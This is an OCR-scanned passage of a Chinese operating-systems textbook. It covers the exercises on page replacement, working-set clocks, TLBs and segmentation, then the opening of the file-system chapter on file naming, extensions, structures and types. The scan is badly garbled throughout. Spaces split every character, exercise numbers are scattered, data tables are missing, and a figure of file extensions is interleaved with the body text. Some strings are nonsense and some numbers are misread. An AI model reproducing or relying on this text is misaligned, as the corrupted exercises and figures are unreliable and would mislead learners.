考虑 图 3-15 b 中 的 页 面 序列 。 假 设 从 页 面 B 到 
页 面 A 的 R 位 分 别 是 11011011。 使 用 第 二 次 机 
会 算法 ， 被 移 走 的 是 哪个 页 面 ? 


.一 台 小 计算 机 有 4 个 页 框 。 在 第 一 个 时 钟 周期 


时 R 位 是 0111 (页 面 0 是 90， 其 他 页 面 是 1), 在 
随后 的 时 钟 周期 中 这 个 值 是 1011、1010、1101、 
0010、1010、1100、0001。 如 果 使 用 带 有 8 位 
计数 器 的 老化 算法 ， 给 出 最 后 一 个 时 钟 周期 后 
4 个 计数 器 的 值 。 


. 请 给 出 一 个 页 面 访问 序列 ， 使 得 对 于 这 个 访问 


序列 ， 使 用 Clock 算 法 和 LRU 算 法 得 到 的 第 一 个 
被 置换 的 页 面 不 同 。 假 设 一 个 进程 分 配 了 3 个 
页 框 ， 访 问 串 中 的 页 号 属于 集合 0，1，2，3。 


.在 图 3-20 c 的 工作 集 时 钟 算法 中 ， 表 针 指 向 那 


个 R=0 的 页 面 。 如 果 Tt=400， 这 个 页 面 将 被 移 
出 吗 ? 如 果 r= 1000 呢 ? 


.假如 工作 集 时 钟 页 面 置换 算法 使 用 的 z 为 两 个 


时 钟 周 期 ， 系 统 状态 如 下 : 





其 中 ,标志 位 V 代 表 有 效 位 ，R 代 表 访 问 位 ， 

M 代 表 修 改 位 。 

(a) 如 果 时 钟 中 断 发 生 在 时 钟 周期 10， 请 给 出 
新 的 表 项 内 容 并 给 出 解释 (可 以 忽略 没有 
改变 的 表 项 ) 。 


34. 一 个 学 生 声 称 : 


35. 从 平均 寻 道 时 间 10ms、 
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(b) 假如 没有 时 钟 中 断 ， 在 时 钟 周 期 10， 因 为 
向 页 4 发 出 了 一 个 读 请 求 而 发 生 了 缺 页 中 
断 。 请 给 出 新 的 表 项 内 容 并 解释 (可 以 忽 
略 没有 改变 的 表 项 ) 。 

“抽象 来 看 ， 除 了 选取 替代 页 

面 使 用 的 属性 不 同 外 ， 基 本 页 面 置换 算法 

(FIFO，LRU， 最 优 算法 ) 都 相同 。” 

(a) FIFO、LRU、 最 优 算法 使 用 的 属性 是 什 
么 ? 

(b) 请 给 出 这 些 页 面 置换 算法 的 通用 算法 。 

旋转 延迟 时 间 10ms、 

每 磁道 32KB 的 磁盘 上 载 入 一 个 64KB 的 程序 ， 

对 于 下 列 页 面 大 小 分 别 需 要 多 少时 间 ? 

(a) 页 面 大 小 为 2KB。 

(b) 页 面 大 小 为 4KB。 

假设 页 面 随机 地 分 布 在 磁盘 上 ， 柱 面 的 数目 非 

常 大 ， 以 致 于 两 个 页 面 在 同一 个 柱 面 的 概率 可 

以 忽略 不 计 。 


36. 一 个 计算 机 有 4 个 页 框 ， 载 和 时 间 、 最 近 一 次 


访问 时 间 和 每 个 页 的 R 位 和 M 位 如 下 所 示 (时 
间 以 一 个 时 钟 周期 为 单位 ): 


a aa a 
ii fo | 





(a) NRU 算 法 将 置换 哪个 页 面 ? 
(b) FIFO 算 法 将 置换 哪个 页 面 ? 
(c) LRU 算 法 将 置换 哪个 页 面 ? 
(d) 第 二 次 机 会 算法 将 置换 哪个 页 面 ? 


37. 假设 有 两 个 进程 A 和 B ， 共 享 一 个 不 在 内 存 的 


页 。 如 果 进 程 A 在 共享 页 发 生 缺 页 ， 当 该 页 读 

入 内 存 时 ，A 的 页 表 项 必须 更 新 。 

(a) 在 什么 条 件 下 ， 即 使 进程 A 的 缺 页 中 断 处 理 
会 将 共享 页 装 和 内存 ，B 的 页 表 更 新 也 会 延 
迟 ? 

(b) 延迟 页 表 更 新 会 有 什么 潜在 开销 ? 


38. 有 二 维 数组 : 


int X[64][64]; 

假设 系统 中 有 4 个 页 框 ， 每 个 页 框 大 小 为 128 
个 字 (一 个 整数 占用 一 个 字 ) 。 处 理 数 组 X 的 
程序 正好 可 以 放 在 一 页 中 ， 而 且 总 是 占用 0 号 
页 。 数 据 会 在 其 他 3 个 页 框 中 被 换 入 或 换 出 。 
数组 X 为 按 行 存储 ( 即 ， 在 内 存 中 ，X[0][0] 之 
后 是 X[0][1])。 下 面 两 段 代码 中 ， 哪 一 个 会 有 
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最 少 的 缺 页 中 断 ? 请 解释 原因 ， 
断 的 总 数 。 

ABE 

for (int j=0; j<64; j++) 

for (int i=0; i<64; i++)X[i][j]=0; 

BEE 

for (int i=0; i<64; i++) 

for (int j=0; j<64; j++)X[i][j]=0; 

假如 你 被 一 家 云 计 算 公 司 雇用 ， 该 公司 在 它 的 
每 个 数据 中 心 都 部 署 了 成 千 上 万 的 服务 器 。 公 
司 最 近 听 说 了 一 个 好 方法 : 在 服务 器 A 上 处 理 
缺 页 中 断 时 ， 是 通过 读 取 其 他 服务 器 的 RAM 
中 的 页 面 ， 以 代替 从 本 地 磁盘 上 读 取 页 面 。 
(a) 这 种 方法 如 何 实现 ? 

(b) 在 什么 条 件 下 该 方法 是 有 价值 的 、 有 效 的 ? 
DEC PDP-1 是 最 早 的 分 时 计算 机 之 一 ， 有 4K 
个 18 位 字 的 内 存 s 在 每 个 时 刻 它 在 内 存 中 保持 
一 个 进程 。 当 调度 程序 决定 运行 另 一 个 进程 时 ， 
将 内 存 中 的 进程 写 到 一 个 换 页 磁 鼓 上 ， 磁 鼓 的 
表面 有 4K 个 18 位 字 。 磁 鼓 可 以 从 任何 字 开 始 
读 写 ， 而 不 是 仅仅 在 字 0。 请 解释 为 什么 要 选 
这 样 的 磁 鼓 ? 

一 台 计 算 机 为 每 个 进程 提供 65536 字 节 的 地 址 
空间 , 这 个 地 址 空间 被 划分 为 多 个 4KB 的 页 面 。 
一 个 特定 的 程序 有 32768 字 节 的 正文 、16386 字 
节 的 数据 和 15870 字 节 的 堆栈 。 这 个 程序 能 装 
入 这 个 机 器 的 地 址 空间 吗 ? 如 果 页 面 大 小 是 
512 字 节 ， 能 放 得 下 吗 ? 记 住 ， 一 个 页 面 不 能 
同时 包含 两 个 或 者 更 多 的 不 同 种 类 段 ， 例 如 ， 
一 页 里 不 能 同时 有 代码 段 和 数据 段 。 


并 计算 缺 页 中 


.人们 已 经 观察 到 在 两 次 缺 页 中 断 之 间 执 行 的 指 


令 数 与 分 配给 程序 的 页 框 数 直接 成 比例 。 如 果 
可 用 内 存 加 倍 , 缺 页 中 断 间 的 平均 间隔 也 加 倍 。 
假设 一 条 普通 指令 需要 1ms， 但 是 如 果 发 生 了 
缺 页 中 断 就 需要 2001us ( 即 2ms 处 理 缺 页 中 
断 )。 假 设 一 个 程序 运行 了 60s， 期 间 发 生 了 
15 000 次 缺 页 中 断 ， 如 果 可 用 内 存 是 原来 的 两 
倍 ， 那 么 这 个 程序 运行 需要 多 少时 间 ? 


. Frugal 计 算 机 公司 有 一 组 操作 系统 设计 人 员 ， 


他 们 正在 考虑 一 种 方法 ， 以 在 新 操作 系统 中 减 
少 对 后 备 存储 数量 的 需求 。 老 板 建议 根本 不 要 
把 程序 正文 保存 在 交换 区 中 ， 而 是 在 需要 的 时 
候 直 接 从 二 进 制 文件 中 调 页 进来 。 在 什么 条 件 
下 (如 果 有 这 样 的 条 件 话 )， 这 种 想法 适用 于 
程序 文本 ? 在 什么 条 件 下 (如果 有 这 样 的 条 件 


44. 


4 


mn 


46. 


47. 


4 


Oo 


49. 


50. 


内 看 管理 


话 )， 这 种 想法 适用 于 数据 ? 

有 一 条 机 器 语言 指令 将 要 被 调 入 ， 该 指令 可 把 
一 个 32 位 字 装 入 含有 32 位 字 地 址 的 寄存 器 。 这 
个 指令 可 能 引起 的 最 大 缺 页 中 断 次 数 是 多 少 ? 


. 解释 内 部 分 段 和 外 部 分 段 的 区 别 。 分 页 系统 用 


的 是 哪 一 种 ?” 纯 分 段 的 系统 用 的 又 是 哪 一 种 ? 
在 MULTICS 中 ， 当 同时 使 用 分 段 和 分 页 时 ， 
首先 必须 查找 段 描述 符 ， 然 后 是 页 描述 符 。 
TLB 也 是 这 样 按 两 级 查找 的 方式 工作 吗 ? 

一 个 程序 中 有 两 个 段 ， 段 0 中 为 指令 ， 段 1 中 为 
读 / 写 数据 。 段 0 有 读 / 执 行 保护 ， 段 1 有 读 / 写 保 
护 。 内 存 是 按 需 分 页 式 虚拟 内 存 系统 ， 它 的 虚 
拟 地 址 为 4 位 页 号 ，10 位 偏 移 量 。 页 表 和 保护 
如 下 所 示 〈 表 中 的 数字 均 为 十 进 制 ) : 








对 于 下 面 的 每 种 情形 ， 给 出 动态 地 址 所 对 应 的 
X (KE) 内 存 地 址 ， 或 者 指出 发 生 了 哪 种 失 
效 〈 缺 页 中 断 或 保护 错误 ) 。 

(a) 读 取 页 : 段 1， 页 1， 偏 移 3， 

(b) 存储 页 : 段 9?， 页 0， 偏 移 16， 

(c) 读 取 页 : 段 1， 页 4， 偏 移 28，; 

(d) 跳 转 到 : 段 1， 页 3， 偏 移 32。 


. 你 能 想象 在 哪些 情况 下 支持 虚拟 内 存 是 个 坏 想 


法 吗 ? 不 支持 虚拟 内 存 能 得 到 什么 好 处 呢 ? 请 
解释 。 

虚拟 内 存 提供 了 进程 隔离 机 制 。 如 果 人 允许 两 个 
操作 系统 同时 运行 ， 在 内 存 管 理 上 会 有 什么 麻 
烦 ?” 如 何 解决 这 些 困难 ? 

构造 一 个 直方 图 ， 计 算 你 的 计算 机 中 可 执行 二 
进 制 文件 大 小 的 平均 值 和 中 间 值 。 在 Windows 
系统 中 ， 观 察 所 有 的 .exe 和 .dl 文件 ， 在 Unix 系 
统 中 ， 观 察 /bin、/usr/bin、/local/bin 目 录 下 的 
所 有 非 脚本 文件 的 可 执行 文件 〈 或 者 使 用 file 
工具 来 查找 所 有 的 可 执行 文件 ) 。 确 定 这 台 机 
器 的 最 优 页 面 大 小 , 只 考虑 代码 (不 包括 数据 ) 。 
考虑 内 部 碎片 和 页 表 大 小 ， 对 页 表 项 的 大 小 做 
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出 合理 的 假设 。 假 设 所 有 的 程序 被 执行 的 可 能 
性 相同 ， 所 以 可 以 同等 对 待 。 


. 编写 一 个 程序 ， 它 使 用 老化 算法 模拟 一 个 分 页 


系统 。 页 框 的 数量 是 一 个 参数 。 页 面 访问 序列 
从 文件 中 读 取 。 对 于 一 个 给 定 的 输入 文件 ， 列 
出 每 1000 个 内 存 访 问 中 发 生 缺 页 中 断 的 数目 ， 
它 是 可 用 页 框 数 的 函数 。 
编写 一 个 程序 ， 模 拟 一 个 使 用 工作 集 时 间 算 法 
的 “玩具 ”分 页 系统 。 我 们 称 之 为 “玩具 ”， 
是 因为 我 们 假设 没有 写 访问 (而 这 与 真实 系统 
大 相 径 庭 )， 进 程 的 终 至 和 创建 也 被 忽略 E 
命 周 期 为 永恒 )。 输 入 为 : 
© Tel MSc Ag iy ol {EL 
“时 钟 周期 间隔 ， 用 内 存 访问 次 数 表 述 
* 一 个 有 页 面 访问 序列 的 文件 
(a) 描述 你 实现 的 基本 数据 结构 和 算法 。 
(b) 运行 该 程序 ， 并 解释 运行 结果 与 你 的 预期 
有 何 出 入 。 
(c) 构造 每 1000 次 内 存 访问 中 缺 页 的 数目 和 工 
作 集 大 小 。 
(d) 如 果 要 处 理 包含 写 操作 的 内 存 访问 流 ， 需 
要 如 何 扩展 该 程序 ? 
编写 一 个 程序 ， 说 明 TLB 未 命中 对 有 效 内 存 访 
问 时 间 的 影响 ， 内 存 访问 时 间 可 以 通过 计算 每 
次 遍历 大 数组 时 的 读 取 时 间 来 衡量 。 
(a) 解释 编程 思想 ， 并 描述 所 期 望 输出 如 何 展 
示 一 些 实际 的 虚拟 内 存 体系 结构 。 
(b) 运行 该 程序 ， 并 解释 运行 结果 与 你 的 预期 
有 何 出 入 。 

(c) 在 一 台 更 古老 的 且 有 着 不 同体 系 结构 的 计 
算 机 上 重复 b， 并 解释 输出 上 的 主要 区 别 。 
编写 一 个 程序 ， 该 程序 能 说 明 在 有 两 个 进程 的 
简单 情况 下 ， 使 用 局 部 页 置换 策略 和 全 局 页 置 
换 策略 的 差异 。 你 将 会 用 到 能 生成 一 个 基于 统 
计 模 型 的 页 面 访问 串 的 例 程 。 这 个 模型 有 N 个 
状态 ， 状 态 编号 从 0 到 N 一 1， 代 表 每 个 可 能 的 
页 面 访 问 ， 每 个 状态 ;相关 的 概率 户 代 表 下 一 次 
访问 仍 指向 同一 页 面 的 概率 。 否 则 ， 下 次 将 以 

等 概率 访问 其 他 任何 一 个 页 面 。 

(a) 证 明 当 N 比 较 小 时 ， 页 面 访问 串 生 成 例 程 能 
运行 正常 。 

(b) 对 有 进程 和 页 框 数 量 固定 的 情况 计算 缺 页 
率 。 解 释 这 种 行为 为 什么 是 正确 的 。 

(c) 对 有 独立 页 面 访问 序列 的 两 个 进程 ， 以 及 b 
中 两 倍 的 页 框 数 ， 重 复 b 实 验 。 
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(d) 用 全 局 策略 替换 局 部 策略 重复 c。 类 似 地 ， 
使 用 局 部 策略 方法 比较 每 个 进程 缺 页 率 。 
55. 编写 一 个 程序 ， 用 于 比较 在 TLB 表 项 加 上 一 个 
标签 域 后 ， 两 个 程序 控制 切换 时 的 效果 。 该 标 
签 域 用 于 指明 该 TLB 表 项 对 应 的 进程 ID， 没 有 
标签 的 TLB 可 以 用 所 有 TLB 表 项 标签 域 相同 来 
进行 模拟 。 输 入 是 : 
“可 用 的 TLB 表 项 数目 。 


RIF 


“ 时钟 周 期 间隔 ， 用 内 存 访问 次 数 表 述 。 


* 一 个 包含 (进程 ， 内 存 访问 ) 序列 的 
文件 。 
“更 新 一 个 TLB 表 项 的 开销 。 
(a) 描述 你 的 实现 中 的 基本 数据 结构 和 算法 。 
(b) 运行 该 程序 ， 并 解释 运行 结果 与 你 的 预期 
有 何 出 入 。 
(c) 标 绘 每 1000 次 访问 中 TLB 更 新 的 次 数 。 
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所 有 的 计算 机 应 用 程序 都 需要 存储 和 检索 信息 。 进 程 运行 时 ， 可 以 在 它 自己 的 地 址 空间 存储 一 定量 
的 信息 ， 但 存储 容量 受 虚 拟 地 址 空间 大 小 的 限制 。 对 于 某 些 应 用 程序 ， 它 自己 的 地 址 空间 已 经 足够 用 
Ts 但 是 对 于 其 他 一 些 应 用 程序 ， 例 如 航空 订 票 系统 、 银 行 系统 或 者 公司 记 账 系统 ， 这 些 存储 空间 又 显 
得 太 小 了 。 

在 进程 的 地 址 空间 上 保存 信息 的 第 二 个 问题 是 : 进程 终止 时 ， 它 保存 的 信息 也 随 之 丢失 。 对 于 很 多 
应 用 (如 数据 库 ) 而 言 ， 有 关 信 息 必 须 能 保存 几 星期 、 几 个 月 ， 甚 至 永久 保留 。 在 使 用 信息 的 进程 终止 
时 ， 这 些 信 息 是 不 可 以 消失 的 ， 甚 至 ， 即 使 是 系统 崩溃 致使 进程 消亡 了 ， 这 些 信 息 也 应 该 保存 下 来 。 

第 三 个 问题 是 : 经 常 需要 多 个 进程 同时 访问 同一 信息 (或 者 其 中 部 分 信息 ) 。 如 果 有 一 个 在 线 电话 
短 ， 这 个 电话 短 仅 在 一 个 进程 的 地 址 空间 内 保存 ， 那 么 只 有 该 进程 才 可 以 对 它 进行 访问 ， 也 就 是 说 一 次 
只 能 查找 一 个 电话 号 码 。 解 决 这 个 问题 的 方法 是 使 信息 本 身 独 立 于 任何 一 个 进程 。 

因此 ， 长 期 存储 信息 有 三 个 基本 要 求 : 

1) 能 够 存储 大 量 信息 。 

2) 使 用 信息 的 进程 终止 时 ， 信 息 仍旧 存在 。 

3) 必须 能 使 多 个 进程 并 发 访问 有 关 信 息 。 

磁盘 (magnetic disk) 由 于 其 长 期 存储 的 性 质 ， 已 经 有 多 年 的 使 用 历史 。 近 些 年 ， 固 态 硬 盘 逐 渐 流 
行 起 来 ， 因 为 它 不 仅 没有 易 损坏 的 移动 部 件 ， 而 且 可 以 提供 快速 的 随机 访问 。 相 比 而 言 ， 虽 然 磁 带 和 光 
盘 也 被 广泛 使 用 ， 但 是 它们 的 性 能 相对 较 差 ， 通 常 应 用 于 备份 。 在 第 5 章 会 学 习 更 多 有 关 磁 盘 的 知识 ， 
目前 可 以 先 把 磁盘 当 作 一 种 大 小 固定 的 块 的 线性 序列 ， 并 且 支 持 如 下 两 种 操作 : 

1) 读 块 k， 

2) Bk. 

事实 上 磁盘 支持 更 多 的 操作 ， 但 只 要 有 了 这 两 种 操作 ， 原 则 上 就 可 以 解决 长 期 存储 的 问题 。 

不 过 ， 这 里 存在 着 很 多 不 便于 实现 的 操作 ， 特 别 是 在 有 很 多 程序 或 者 多 用 户 使 用 着 的 大 型 系统 上 
(如 服务 器 )。 在 这 种 情况 下 ， 很 容易 产生 一 些 问题 ， 例 如 : 

1) 如 何 找 到 信息 ? 

2) 如 何 防 止 一 个 用 户 读 取 另 一 个 用 户 的 数据 ? 

3) 如 何 知道 哪些 块 是 空闲 的 ? 

就 像 操作 系统 提取 处 理 器 的 概念 来 建立 进程 的 抽象 , 以 及 提取 物理 存储 器 的 概念 来 建立 进程 (虚拟 ) 
地 址 空间 的 抽象 那样 ， 我 们 可 以 用 一 个 新 的 抽象 一 一 文件 来 解决 这 个 问题 。 进 程 (与 线程 )、 地 址 空间 
和 文件 ， 这 些 抽象 概念 均 是 操作 系统 中 最 重要 的 概念 。 如 果真 正 深入 理解 了 这 三 个 概念 ， 那 么 读者 就 迈 
上 了 成 为 一 个 操作 系统 专家 的 道路 。 

文件 是 进程 创建 的 信息 逻辑 单元 。 一 个 磁盘 一 般 含有 几 千 其 至 几 百 万 个 文件 ， 每 个 文件 是 独立 于 其 
他 文件 的 ， 唯 一 不 同 的 是 文件 是 对 磁盘 的 建 模 ， 而 非 对 RAM 的 建 模 。 事 实 上 ， 如 果 能 把 每 个 文件 看 成 
一 个 地 址 空间 ， 那 么 读者 就 能 理解 文件 的 本 质 了 。 

进程 可 以 读 取 已 经 存在 的 文件 ， 并 在 需要 时 建立 新 的 文件 。 存 储 在 文件 中 的 信息 必须 是 持久 的 ， 也 
就 是 说 ， 不 会 因为 进程 的 创建 与 终止 而 受到 影响 。 一 个 文件 只 能 在 其 所 有 者 明确 删除 它 的 情况 下 才 会 消 
失 。 尽 管 读 写 文件 是 最 常见 的 操作 ， 但 还 有 很 多 其 他 操作 ， 其 中 一 些 将 在 下 面 加 以 介绍 。 

文件 是 受 操作 系统 管理 的 。 有 关 文件 的 构造 、 命 名 、 访 问 、 使 用 、 保 护 、 实 现 和 管理 方法 都 是 操作 系统 
设计 的 主要 内 容 。 从 总 体 上 看 ， 操 作 系 统 中 处 理 文件 的 部 分 称 为 文件 系统 (file system) ， 这 就 是 本 章 的 论题 。 

从 用 户 角 度 来 看 ， 文 件 系 统 中 最 重要 的 是 它 在 用 户 眼中 的 表现 形式 ， 也 就 是 文件 是 由 什么 组 成 的 ， 
怎样 给 文件 命名 ， 怎 样 保护 文件 ， 以 及 可 以 对 文件 进行 哪些 操作 等 。 至 于 用 链表 还 是 用 位 图 来 记录 空闲 


148 pA 


存储 区 以 及 在 一 个 逻辑 磁盘 块 中 有 多 少 个 扇 区 等 细节 并 不 是 用 户 所 关心 的 ， 当 然 对 文件 系统 的 设计 者 来 
说 这 些 内 容 是 相当 重要 的 。 正 因为 如 此 ， 本 章 将 分 为 几 节 讲 述 ， 前 两 节 分 别 介绍 文件 和 目录 的 用 户 接 
口 ， 随 后 详细 讨论 文件 系统 的 实现 ， 最 后 介绍 一 些 文件 系统 的 实例 。 


4.1 文件 
在 本 节 中 ， 我 们 从 用 户 角度 来 考察 文件 ， 即 用 户 如 何 使 用 文件 ? 文件 具有 哪些 特性 ? 


4.1.1 文件 命名 

文件 是 一 种 抽象 机 制 ， 它 提供 了 一 种 在 磁盘 上 保存 信息 而 且 方 便 以 后 读 取 的 方法 。 这 种 方法 可 以 使 
用 户 不 必 了 解 存储 信息 的 方法 、 位 置 和 实际 磁盘 工作 方式 等 有 关 细 节 。 

也 许 任何 一 种 抽象 机 制 的 最 重要 的 特性 就 是 对 管理 对 象 的 命名 方式 ， 所 以 ， 我 们 将 从 对 文件 的 命名 
开始 考察 文件 系统 。 在 进程 创建 文件 时 ， 它 给 文件 命名 。 在 进程 终止 时 ， 该 文件 仍旧 存在 ， 并 且 其 他 进 
程 可 以 通过 这 个 文件 名 对 它 进行 访问 。 

文件 的 具体 命名 规则 在 各 个 系统 中 是 不 同 的 ， 不 过 所 有 的 现代 操作 系统 都 允许 用 1 至 8 个 字母 组 成 的 
字符 串 作 为 合法 的 文件 名 。 因 此 ，andrea、bruce 和 cathy 都 是 合法 文件 名 。 通 常 ， 文 件 名 中 也 允许 有 数字 
和 一 些 特殊 字符 ， 所 以 像 2、urgent! 和 Fig.2-14 也 是 合法 的 。 许 多 文件 系统 支持 长 达 255 个 字符 的 文件 名 。 

有 些 文件 系统 区 分 大 小 写字 母 ， 有 些 则 不 区 分 。UNIX 属 于 前 一 类 ， 老 的 文件 系统 MS-DOS 则 属于 
后 一 类 。( 顺 便 提 一 下 ， 尽 管 MS-DOS 很 古老 了 ， 但 它 仍然 非常 广泛 地 应 用 于 艇 入 式 系统 ， 所 以 MS-DOS 
绝对 没有 过 时 。) 所 以 ， 在 UNIX 系 统 中 maria、Maria 和 MARIA 是 三 个 不 同 的 文件 ， 而 在 MS-DOS 中 ， 它 
们 是 同一 个 文件 。 

关于 文件 系统 在 这 里 需要 播 一 句 ，Windows 95 和 Windows 98 用 的 都 是 MS-DOS 的 文件 系统 ， 即 
FAT-16， 因 此 继承 了 其 很 多 特性 ， 例 如 有 关 文件 名 的 构造 方法 。Windows 98 对 FAT-16 进 行 了 一 些 扩 展 ， 
从 而 成 为 FAT-32， 但 这 两 者 是 很 相似 的 。 另 外 ， 虽 然 FAT 已 经 过 时 ， 但 Windows NT、Windows 2000、 
Windows XP, Windows Vista, Windows 7 和 Windows 8 依然 支持 该 文件 系统 。 然 而 ， 较 新 版 本 的 操作 系 
统 已 经 拥有 更 先进 的 本 地 文件 系统 






































(NTFS) ， 该 文件 系统 具有 一 些 新 的 特 ”| 一 | ES 

性 (例如 基于 Unicode 编 码 的 文件 名 ) 。 C 源 程序 文件 

FKE, Windows 8 配备 了 另 一 种 文 | git 符合 图 形 交换 格式 的 图 像 文件 | 
件 系统 ， 简 称 为 ReFS (或 弹性 文件 系 hlp 帮助 文件 

统 )， 但 该 文件 系统 一 般 用 于 Windows html WWW 超 文本 标记 语言 文档 

8 的 服务 器 版 本 。 在 本 章 中 ， 当 提 到 jpg 符合 JPEG 编 码 标准 的 静态 图 片 | 
MS-DOS 或 FAT 文 件 系 统 的 时 候 ， 除 非 mp3 符合 MP3 音 频 编码 格式 的 音乐 文件 

特别 指明 ， 否 则 所 指 的 就 是 Windows mpg | 符合 MPEG 编 码 标准 的 电影 | 
WRATHCHPATS2, AASB o 目标 文件 (编译 器 输出 格式 ， 尚 未 链接 ) 





pdf pdf 格 式 的 文件 





FAT 文 件 系统 ， 在 第 11 章 详细 分 析 











ie ps PostScript 文 件 
Windows 8 时 将 讨论 NTFS 文 件 系统 。 tex 为 TEX 格 式 化 程序 准备 的 输入 文件 al 
顺便 说 一 下 ， 有 一 种 类 似 FAT 的 新 型 tt 一 般 正文 文件 

















文件 系统 ， 叫 作 exFAT。 它 是 微软 公 zip 压缩 文件 
司 对 闪存 和 大 文件 系统 开发 的 一 种 优 
化 的 FAT32 扩 展 版 本 。ExFAT 是 现在 图 4 1 一 些 典型 的 文件 扩展 名 
微软 唯一 能 满足 OS X 读 写 操作 的 文件 系统 。 

许多 操作 系统 支持 文件 名 用 圆 点 隔 开 分 为 两 部 分 ， 如 文件 名 prog.c。 圆 点 后 面 的 部 分 称 为 文件 扩展 
名 (file extension) ， 文 件 扩 展 名 通常 表示 文件 的 一 些 信息 ， 如 MS-DOS 中 ,文件 名 由 1 至 8 个 字符 以 及 1 
至 3 个 字符 的 可 选 扩展 名 组 成 。 在 UNIX 里 ， 如 果 有 扩展 名 ， 则 扩展 名 长 度 完全 由 用 户 决定 ， 一 个 文件 其 
至 可 以 包含 两 个 或 更 多 的 扩展 名 。 如 homepage.html.zip， 这 里 .html 表 明 HTML 格 式 的 一 个 Web 页 面 ，.zip 
表示 该 文件 (homepage.html) 已 经 采用 zip 程 序 压缩 过 。 一 些 常 用 文件 扩展 名 及 其 含义 如 图 4-1 所 示 。 

在 某 些 系统 中 (如 所 有 UNIX 版 本 )， 文件 扩展 名 只 是 一 种 约定 ， 操 作 系 统 并 不 强迫 采用 它 。 名 为 
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file.txt 的 文件 也 许 是 文本 文件 ， 这 个 文件 名 更 多 的 是 提醒 所 有 者 ， 而 不 是 表示 传送 什么 信息 给 计算 机 。 但 是 
另 一 方面 ，C 编 译 器 可 能 要 求 它 编译 的 文件 以 .c 结 尾 ， 否 则 它 会 拒绝 编译 。 然 而 ， 操 作 系 统 不 关心 这 一 点 。 

对 于 可 以 处 理 多 种 类 型 文件 的 某 个 程序 ， 这 类 约定 是 特别 有 用 的 。 例 如 ，C 编 译 器 可 以 编译 、 链 接 
多 种 文件 ， 包 括 C 文 件 和 汇编 语言 文件 。 这 时 扩展 名 就 很 有 必要 ， 编 译 器 利用 它 区 分 哪些 是 C 文 件 ， 哪 
些 是 汇编 文件 ， 哪 些 是 其 他 文件 。 

与 UNIX 相 反 ，Windows 关 注 扩 展 名 且 对 其 赋予 了 含义 。 用 户 (或 进程 ) 可 以 在 操作 系统 中 注册 扩展 
名 ,并且 规 定 哪个 程序 “拥有 ”该 扩展 名 。 当 用 户 双 击 某 个 文件 名 时 ,“ 拥 有 ”该 文件 扩展 名 的 程序 就 启 
动 并 运行 该 文件 。 例 如 ， 双 击 file.docx 启 动 了 Microsoft Word 程 序 ， 并 以 file.docx 作 为 待 编辑 的 初始 文件 。 
4.1.2 文件 结构 

文件 可 以 有 多 种 构造 方式 ， 在 图 4-2 中 列 出 了 常用 的 三 种 方式 。 图 4-2a 中 的 文件 是 一 种 无 结构 的 字 
节 序 列 ， 事 实 上 操作 系统 不 知道 也 不 关心 文件 内 容 是 什么 ， 操 作 系 统 所 见 到 的 就 是 字 节 ， 其 文件 内 容 的 
任何 含义 只 在 用 户 程序 中 解释 。UNIX 和 Windows 都 采用 这 种 方法 。 


1 个 字 节 1 个 记录 





图 4-2 三 种 文件 结构 : a) 字 节 序列 ，b) 记录 序列 ，c) 树 


把 文件 看 成 字 节 序列 为 操作 系统 提供 了 最 大 的 灵活 性 。 用 户 程序 可 以 向 文件 中 加 入 任何 内 容 ， 并 以 
任何 方便 的 形式 命名 。 操 作 系统 不 提供 任何 帮助 ， 但 也 不 会 构成 障碍 。 对 于 想 做 特殊 操作 的 用 户 来 说 ， 
后 者 是 非常 重要 的 。 所 有 UNIX 版 本 (包括 Linux 和 OS X) 以 及 Windows 都 采用 这 种 文件 模型 。 

图 4-2b 表 示 在 文件 结构 上 的 第 一 步 改 进 。 在 这 个 模型 中 ,文件 是 具有 固定 长 度 记录 的 序列 ， 每 个 记 
录 都 有 其 内 部 结构 。 把 文件 作为 记录 序列 的 中 心思 想 是 : 读 操 作 返回 一 个 记录 ， 而 写 操作 重 写 或 追加 一 
个 记录 。 这 里 对 “记录 ”给 予 一 个 历史 上 的 说 明 ， 几 十 年 前 ， 当 80 列 的 穿孔 卡片 还 是 主流 的 时 候 ， 很 多 
(大 型 机 ) 操作 系统 把 文件 系统 建立 在 由 80 个 字符 的 记录 组 成 的 文件 基础 之 上 。 这 些 操作 系统 也 支持 132 
个 字符 的 记录 组 成 的 文件 ， 这 是 为 了 适应 行 式 打印 机 (当时 的 行 式 打 印 机 有 132 列 宽 )。 程 序 以 80 个 字符 
为 单位 读 和 人 数据， 并 以 132 个 字符 为 单位 写 数据 ， 其 中 后 面 52 个 字符 都 是 空格 。 现 在 已 经 没有 使 用 这 种 
文件 系统 的 通用 系统 了 ， 但 是 在 80 列 穿孔 卡片 和 132 列 宽 行 式 打印 机 流行 的 日 子 里 ， 这 是 大 型 计算 机 系 
统 中 的 常见 模式 。 

第 三 种 文件 结构 如 图 4-2c 所 示 。 文 件 在 这 种 结构 中 由 一 棵 记录 树 构 成 ， 每 个 记录 不 必 具 有 相同 的 长 度 ， 
记录 的 固定 位 置 上 有 一 个 键 字段 。 这 棵 树 按 “ 键 ”字段 进行 排序 ， 从 而 可 以 对 特定 “ 键 ” 进 行 快速 查找 。 

虽然 在 这 类 结构 中 取 “ 下 一 个 ”记录 是 可 以 的 ， 但 是 基本 操作 并 不 是 取 “ 下 一 个 ”记录 ， 而 是 获得 
具有 特定 键 的 记录 。 如 图 4-2c 中 的 文件 zoo， 用 户 可 以 要 求 系统 读 取 键 为 pony 的 记录 ， 而 不 必 关 心 记录 
在 文件 中 的 确切 位 置 。 更 进一步 地 ， 用 户 可 以 在 文件 中 添加 新 记录 。 但 是 ,. 用 户 不 能 决定 把 记录 添加 在 
文件 的 什么 位 置 ， 这 是 由 操作 系统 决定 的 。 这 类 文件 结构 与 UNIX 和 Windows 中 采用 的 无 结构 字 节 流明 
显 不 同 ， 但 它 在 一 些 处 理 商 业 数 据 的 大 型 计算 机 中 获得 广泛 使 用 。 


4.1.3 文件 类 型 
很 多 操作 系统 支持 多 种 文件 类 型 。 如 UNIX (当然 ,包括 OS X) 和 Windows 中 都 有 普通 文件 和 目录 ， 
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UNIX 还 有 字符 特殊 文件 (character special file) 和 块 特殊 文件 (block special file) 。 普 通 文件 (regular 
file) 是 包含 有 用 户 信息 的 文件 。 图 4-2 中 的 所 有 文件 都 是 普通 文件 。 目 录 (directory) 是 管理 文件 系统 
结构 的 系统 文件 ， 将 在 以 后 的 章节 中 讨论 。 字 符 特 殊 文 件 和 输入 /输出 有 关 ， 用 于 串 行 IO 类 设备 ， 如 终 
端 、 打 印 机 、 网 络 等 。 块 特殊 文件 用 于 磁盘 类 设备 。 本 章 主 要 讨论 普通 文件 。 

